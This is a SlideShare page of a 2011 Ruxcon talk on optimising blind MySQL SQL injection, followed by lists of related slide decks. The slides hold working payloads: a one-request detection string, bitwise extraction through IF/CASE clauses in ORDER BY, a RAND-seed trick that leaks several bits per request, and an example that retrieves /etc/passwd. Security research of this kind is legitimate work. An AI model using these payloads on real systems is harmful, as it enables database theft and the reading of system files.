SlideShare una empresa de Scribd logo

Harder Faster Stronger

S
snyff

Talk done by Luke Jahnke and I in 2011 at Ruxcon on optimisation of SQL injections

Tecnología
1 de 43
Descargar para leer sin conexión
Louis <louis@securusglobal.com> Luke <luke@securusglobal.com>
SELECT user FROM mysql.user LIMIT 2 • Security consultants working for Securus Global in Melbourne • Have done/are doing a lot a web pentesting • Research focus on web security: – Web Attacks – Web Application Scanners (WAS) testing – Web Application Firewall (WAF) testing – (In)Secure coding
Why do we want to optimize SQL injections? • Stealth • Retrieving a large amount of data • Being faster • Because you’re bored using sqlmap • Because it’s fun
What can be optimized? • Length of the injection • Number of requests to retrieve information – Optimize retrieval strategy – Optimizations on information
Reducing injection length (MySQL) • SUBSTR() instead of SUBSTRING() • MID() instead of SUBSTR() • Using CRC32() – Instead of using the long string you replace it with the CRC32
Reducing injection length (MySQL) • SELECT@@version instead of SELECT VERSION() • &&1 instead of AND 1=1 • &1 instead of &&1 • ||1 instead of OR 1=1 • |1 instead of ||1 (fails for NULL|1)
Reducing injection length (MySQL) • !id instead of id=0 • > instead of <= (don’t forget to swap the
String Retrieval • LENGTH('admin') = 5 – 5 * 7 bits = 35 requests • LENGTH(COMPRESS('admin')) = 17 – 17 * 7 bits = 119 requests
Original vs Compressed • Based on CVE allitems.txt – about 47,000 VARCHAR(1000) SELECT ROUND(AVG( LENGTH(COMPRESS(SUBSTRING( text,1,N ))) )) FROM texts
How to get 80 characters? SELECT COMPRESS(CONCAT_WS(':', id,name,age,address,password )) FROM users SELECT GROUP_CONCAT(user,password) FROM users; • 1024 Character limit
Hash Retrieval • LENGTH(MD5('X')) = 32 – 32 * 7 bits = 224 requests • LENGTH(COMPRESS(MD5('X')) = 44 – 44 * 7 bits = 308 requests
Hash Retrieval • Hash keyspace [0-9a-f] • LENGTH(UNHEX(MD5(‘X’))) = 16 – Need to retrieve all 8 bits – 16 x 8 bits = 128 requests
Integer Retrieval • “131” → 3 x 7bits • 131 → 8 bits • Dichotomy search • Use CONV()
Improving Detection • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • Really good payload to detect SQL injection in one request
Data prediction
Using Markov • Given the current characters what is the next character most likely going to be • Learning from a list of table names, column names and data to get a model of the data • For each request check if the character is the one predicted before trying to retrieve his 7 bits
Tree • Based on the information already retrieved guess the next characters • For example if I already retrieved RUX, the next character is likely to be C … for RUXCON • And if you don’t have anything in your tree matching, you can use markov
Tree learning process
Tree learning process
Guessing process • You already have “RU”
Statistics • No optimisation: 3345 • Markov: 3102 • Markov + Lowercase: 3006 • Markov + Lowercase + Tree: 1166 • Updating the tree when retrieving information can be used as well, but not always effective
Maximising information retrieved for each request
Vulnerability … $o = $_GET['order']; $sql = 'SELECT * FROM users'; $sql .= 'ORDER BY '; $sql .= mysql_real_escape_string($o); $result = mysql_sql($sql); …
Exploitation • Slow brute force: – Blindly check each character against the alphabet • A bit better: IF (ASCII(substring((select @@version),1,1))&1, id, name) IF (ASCII(substring((select @@version),1,1))&2, id, name) IF (ASCII(substring((select @@version),1,1))&4, id, name) IF (ASCII(substring((select @@version),1,1))&8, id, name) IF (ASCII(substring((select @@version),1,1))&16, id, name) IF (ASCII(substring((select @@version),1,1))&32, id, name) IF (ASCII(substring((select @@version),1,1))&64, id, name) IF (ASCII(substring((select @@version),2,1))&1, id, name)
Exploitation • Blind SQLi: 2 states • We can do better... – Let say we have 4 columns: => 4 states – order by can sort by multiple columns: “order by firstname, lastname” => more states (8 if lucky) – Color Blind SQLi (copyright Nicolas Collignon)
Exploitation • For each combinations of order by: – fingerprint the response (with cast for id) – md5 for global warming • SQL has a case statement: CASE (ASCII(substring((select @@version),1,1))&4) WHEN 0 then column1 WHEN 1 then column2 WHEN 2 then column3 WHEN 3 then column4 END
Exploitation ## Retrieving ----XXXX CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC ## Retrieving XXXX---- CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC © Securus Global 2010
Exploitation SELECT id,username FROM users id username 1 admin 2 moderator 3 guest
Exploitation SELECT id,username FROM users ORDER BY RAND() id username 2 moderator 1 admin 3 guest
Exploitation SELECT id,username FROM users ORDER BY RAND() id username 3 guest 2 moderator 1 admin
Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
Exploitation RAND seed Order of id 0 1,2,3 1 3,1,2 2 2,3,1 3 3,2,1 4 1,2,3
Exploitation RAND seed Order of id Bits 0 1,2,3 00 1 3,1,2 01 2 2,3,1 10 3 3,2,1 11
Exploitation RAND( CONV( CONCAT( IF((true/false),0,1), IF((true/false),0,1) ) ,2,10 ) )
Exploitation
Statistics Rows Bits 2-6 1 7 5 8 5 9 9 10 11 11 12 12 13 13 17
Real World Scenario • 7 rows • Can retrieve 5 bits per request • 1830 characters (14640 bits) in /etc/passwd • Retrieve with 2930 requests • 740 characters for compressed /etc/passwd • Retrieved with 1186 requests
Source available tomorrow at: https://github.com/lukejahnke
Questions?

Recomendados

Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
ORMs in Golang
ORMs in GolangORMs in Golang
ORMs in GolangIkenna Okpala
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsjacekbecela
 
Building Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptBuilding Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptroyaldark
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 

Recomendados

Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
ORMs in Golang
ORMs in GolangORMs in Golang
ORMs in GolangIkenna Okpala
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsjacekbecela
 
Building Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptBuilding Fast, Modern Web Applications with Node.js and CoffeeScript
Building Fast, Modern Web Applications with Node.js and CoffeeScriptroyaldark
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 
Intsllation & 1st program nodejs
Intsllation & 1st program nodejsIntsllation & 1st program nodejs
Intsllation & 1st program nodejsmonikadeshmane
 
A million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleA million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleTom Croucher
 
Building servers with Node.js
Building servers with Node.jsBuilding servers with Node.js
Building servers with Node.jsConFoo
 
Node js presentation
Node js presentationNode js presentation
Node js presentationmartincabrera
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班hugo lu
 
Design patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodDesign patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodOrtus Solutions, Corp
 
Node.js - A Quick Tour
Node.js - A Quick TourNode.js - A Quick Tour
Node.js - A Quick TourFelix Geisendörfer
 
Comet with node.js and V8
Comet with node.js and V8Comet with node.js and V8
Comet with node.js and V8amix3k
 
Node.js - Best practices
Node.js - Best practicesNode.js - Best practices
Node.js - Best practicesFelix Geisendörfer
 
Exploring Clojurescript
Exploring ClojurescriptExploring Clojurescript
Exploring ClojurescriptLuke Donnet
 
Node.js 0.8 features
Node.js 0.8 featuresNode.js 0.8 features
Node.js 0.8 featuresNicholas McClay
 
Zen of Akka
Zen of AkkaZen of Akka
Zen of AkkaKonrad Malawski
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JSHarsha Vashisht
 
NodeJS for Beginner
NodeJS for BeginnerNodeJS for Beginner
NodeJS for BeginnerApaichon Punopas
 
Spock: Test Well and Prosper
Spock: Test Well and ProsperSpock: Test Well and Prosper
Spock: Test Well and ProsperKen Kousen
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksJuho Vepsäläinen
 
We Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentWe Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentAll Things Open
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
MongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB
 
NOSQL and Cassandra
NOSQL and CassandraNOSQL and Cassandra
NOSQL and Cassandrarantav
 

Más contenido relacionado

La actualidad más candente

Intsllation & 1st program nodejs
Intsllation & 1st program nodejsIntsllation & 1st program nodejs
Intsllation & 1st program nodejsmonikadeshmane
 
A million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleA million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleTom Croucher
 
Building servers with Node.js
Building servers with Node.jsBuilding servers with Node.js
Building servers with Node.jsConFoo
 
Node js presentation
Node js presentationNode js presentation
Node js presentationmartincabrera
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班hugo lu
 
Design patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodDesign patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodOrtus Solutions, Corp
 
Comet with node.js and V8
Comet with node.js and V8Comet with node.js and V8
Comet with node.js and V8amix3k
 
Exploring Clojurescript
Exploring ClojurescriptExploring Clojurescript
Exploring ClojurescriptLuke Donnet
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Spock: Test Well and Prosper
Spock: Test Well and ProsperSpock: Test Well and Prosper
Spock: Test Well and ProsperKen Kousen
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksJuho Vepsäläinen
 
We Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentWe Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentAll Things Open
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 

La actualidad más candente (20)

Intsllation & 1st program nodejs
Intsllation & 1st program nodejsIntsllation & 1st program nodejs
Intsllation & 1st program nodejs
 
A million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scaleA million connections and beyond - Node.js at scale
A million connections and beyond - Node.js at scale
 
Building servers with Node.js
Building servers with Node.jsBuilding servers with Node.js
Building servers with Node.js
 
Node js presentation
Node js presentationNode js presentation
Node js presentation
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班
 
Design patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad WoodDesign patterns - Common Solutions to Common Problems - Brad Wood
Design patterns - Common Solutions to Common Problems - Brad Wood
 
Node.js - A Quick Tour
Node.js - A Quick TourNode.js - A Quick Tour
Node.js - A Quick Tour
 
Comet with node.js and V8
Comet with node.js and V8Comet with node.js and V8
Comet with node.js and V8
 
Node.js - Best practices
Node.js - Best practicesNode.js - Best practices
Node.js - Best practices
 
Exploring Clojurescript
Exploring ClojurescriptExploring Clojurescript
Exploring Clojurescript
 
Node.js 0.8 features
Node.js 0.8 featuresNode.js 0.8 features
Node.js 0.8 features
 
Zen of Akka
Zen of AkkaZen of Akka
Zen of Akka
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
hacking with node.JS
hacking with node.JShacking with node.JS
hacking with node.JS
 
NodeJS for Beginner
NodeJS for BeginnerNodeJS for Beginner
NodeJS for Beginner
 
Spock: Test Well and Prosper
Spock: Test Well and ProsperSpock: Test Well and Prosper
Spock: Test Well and Prosper
 
Survive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and TricksSurvive JavaScript - Strategies and Tricks
Survive JavaScript - Strategies and Tricks
 
We Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End DevelopmentWe Are All Testers Now: The Testing Pyramid and Front-End Development
We Are All Testers Now: The Testing Pyramid and Front-End Development
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 

Similar a Harder Faster Stronger

MongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB
 
NOSQL and Cassandra
NOSQL and CassandraNOSQL and Cassandra
NOSQL and Cassandrarantav
 
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Ontico
 
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...ZFConf Conference
 
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2aaronmorton
 
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2DataStax
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsServer Density
 
Haskell for data science
Haskell for data scienceHaskell for data science
Haskell for data scienceJohn Cant
 
2014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-22014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-2MongoDB
 
Scaling MySQL Strategies for Developers
Scaling MySQL Strategies for DevelopersScaling MySQL Strategies for Developers
Scaling MySQL Strategies for DevelopersJonathan Levin
 
How did i steal your database CSCamp2011
How did i steal your database CSCamp2011How did i steal your database CSCamp2011
How did i steal your database CSCamp2011Mostafa Siraj
 
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterpriseA Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterprisePatrick McFadin
 
Apache Cassandra - Data modelling
Apache Cassandra - Data modellingApache Cassandra - Data modelling
Apache Cassandra - Data modellingAlex Thompson
 
SMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning ApproachSMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning ApproachReza Rahimi
 
SequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational DatabaseSequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational Databasewangzhonnew
 
MongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: ShardingMongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: ShardingMongoDB
 
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...NoNameCon
 
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...Altinity Ltd
 

Similar a Harder Faster Stronger (20)

MongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: ShardingMongoDB for Time Series Data Part 3: Sharding
MongoDB for Time Series Data Part 3: Sharding
 
NOSQL and Cassandra
NOSQL and CassandraNOSQL and Cassandra
NOSQL and Cassandra
 
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
 
Solr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene EuroconSolr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene Eurocon
 
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
ZFConf 2011: Что такое Sphinx, зачем он вообще нужен и как его использовать с...
 
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
Cassandra Community Webinar - Introduction To Apache Cassandra 1.2
 
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
Cassandra Community Webinar | Introduction to Apache Cassandra 1.2
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
MongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & AnalyticsMongoDB: Optimising for Performance, Scale & Analytics
MongoDB: Optimising for Performance, Scale & Analytics
 
Haskell for data science
Haskell for data scienceHaskell for data science
Haskell for data science
 
2014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-22014 05-07-fr - add dev series - session 6 - deploying your application-2
2014 05-07-fr - add dev series - session 6 - deploying your application-2
 
Scaling MySQL Strategies for Developers
Scaling MySQL Strategies for DevelopersScaling MySQL Strategies for Developers
Scaling MySQL Strategies for Developers
 
How did i steal your database CSCamp2011
How did i steal your database CSCamp2011How did i steal your database CSCamp2011
How did i steal your database CSCamp2011
 
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax EnterpriseA Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
A Cassandra + Solr + Spark Love Triangle Using DataStax Enterprise
 
Apache Cassandra - Data modelling
Apache Cassandra - Data modellingApache Cassandra - Data modelling
Apache Cassandra - Data modelling
 
SMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning ApproachSMS Spam Filter Design Using R: A Machine Learning Approach
SMS Spam Filter Design Using R: A Machine Learning Approach
 
SequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational DatabaseSequoiaDB Distributed Relational Database
SequoiaDB Distributed Relational Database
 
MongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: ShardingMongoDB for Time Series Data: Sharding
MongoDB for Time Series Data: Sharding
 
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
Artem Storozhuk - Search over encrypted records: from academic dreams to prod...
 
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
Analytics at Speed: Introduction to ClickHouse and Common Use Cases. By Mikha...
 

Más de snyff

JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5usnyff
 
Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)snyff
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Entrepreneurship for hackers
Entrepreneurship for hackersEntrepreneurship for hackers
Entrepreneurship for hackerssnyff
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystackssnyff
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661snyff
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositoriessnyff
 
Owasp tds
Owasp tdsOwasp tds
Owasp tdssnyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 

Más de snyff (10)

JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
 
Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)Code that gets you pwn(s|'d)
Code that gets you pwn(s|'d)
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
Entrepreneurship for hackers
Entrepreneurship for hackersEntrepreneurship for hackers
Entrepreneurship for hackers
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
Finding Needles in Haystacks
Finding Needles in HaystacksFinding Needles in Haystacks
Finding Needles in Haystacks
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
 
Ln monitoring repositories
Ln monitoring repositoriesLn monitoring repositories
Ln monitoring repositories
 
Owasp tds
Owasp tdsOwasp tds
Owasp tds
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 

Último

How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Último (20)

How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
